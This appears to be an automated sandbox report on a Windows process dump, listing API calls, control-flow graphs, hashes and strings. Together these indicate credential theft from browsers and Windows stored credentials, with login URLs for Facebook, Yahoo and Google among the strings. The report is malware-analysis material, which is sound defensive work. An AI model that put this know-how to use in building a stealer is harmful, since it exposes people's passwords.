                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                      • wcsrchr.MSVCRT ref: 0040B738
                      • memset.MSVCRT ref: 0040B756
                      • memset.MSVCRT ref: 0040B7F5
                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                      • memset.MSVCRT ref: 0040B851
                      • memset.MSVCRT ref: 0040B8CA
                      • memcmp.MSVCRT ref: 0040B9BF
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • memset.MSVCRT ref: 0040BB53
                      • memcpy.MSVCRT ref: 0040BB66
                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$Freewcsrchr$AddressChangeCloseCreateFileFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                      • String ID: chp$v10
                      • API String ID: 824451583-2783969131
                      • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                      • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 513 40e304-40e316 call 406e8f 511->513 517 40e476-40e483 call 406b53 513->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 513->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f ??3@YAXPAX@Z 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 554 40e3c3-40e3c6 551->554 552->553 555 40e416-40e427 memcpy 553->555 556 40e42a-40e42f 553->556 554->542 555->556 557 40e431-40e442 memcpy 556->557 558 40e445-40e44a 556->558 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                      • wcschr.MSVCRT ref: 0040E3B8
                      • memcpy.MSVCRT ref: 0040E3EC
                      • memcpy.MSVCRT ref: 0040E407
                      • memcpy.MSVCRT ref: 0040E422
                      • memcpy.MSVCRT ref: 0040E43D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                      • API String ID: 3073804840-2252543386
                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                      • String ID:
                      • API String ID: 3715365532-3916222277
                      • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                      • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 649 413e79-413e9d call 413959 call 413ca4 643->649 650 413e28-413e35 643->650 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 651 413edb-413ee2 646->651 647->651 663 413ea2-413eae CloseHandle 649->663 654 413e61-413e68 650->654 655 413e37-413e44 GetModuleHandleW 650->655 656 413ee4 651->656 657 413ee7-413efe 651->657 654->649 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->649 663->642
                      APIs
                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                      • memset.MSVCRT ref: 00413D7F
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                      • memset.MSVCRT ref: 00413E07
                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                      • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                      • API String ID: 912665193-1740548384
                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                        • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                      • CloseHandle.KERNEL32(?), ref: 0040E148
                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                      • String ID: bhv
                      • API String ID: 327780389-2689659898
                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                      • API String ID: 2941347001-70141382
                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                      • String ID:
                      • API String ID: 2827331108-0
                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • wcschr.MSVCRT ref: 0040C324
                      • wcschr.MSVCRT ref: 0040C344
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • GetLastError.KERNEL32 ref: 0040C373
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                      • String ID: visited:
                      • API String ID: 1157525455-1702587658
                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 ??3@YAXPAX@Z 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                      • _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                      • API String ID: 3883404497-2982631422
                      • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                      • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                      • memset.MSVCRT ref: 0040BC75
                      • memset.MSVCRT ref: 0040BC8C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                      • memcmp.MSVCRT ref: 0040BCD6
                      • memcpy.MSVCRT ref: 0040BD2B
                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                      • String ID:
                      • API String ID: 509814883-3916222277
                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                      • String ID: r!A
                      • API String ID: 2791114272-628097481
                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      • _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                      • wcslen.MSVCRT ref: 0040C82C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                      • API String ID: 62308376-4196376884
                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                      • memcpy.MSVCRT ref: 0040B60D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                      • String ID: BIN
                      • API String ID: 1668488027-1015027815
                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                      APIs
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • wcslen.MSVCRT ref: 0040BE06
                      • _wcsncoll.MSVCRT ref: 0040BE38
                      • memset.MSVCRT ref: 0040BE91
                      • memcpy.MSVCRT ref: 0040BEB2
                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                      • wcschr.MSVCRT ref: 0040BF24
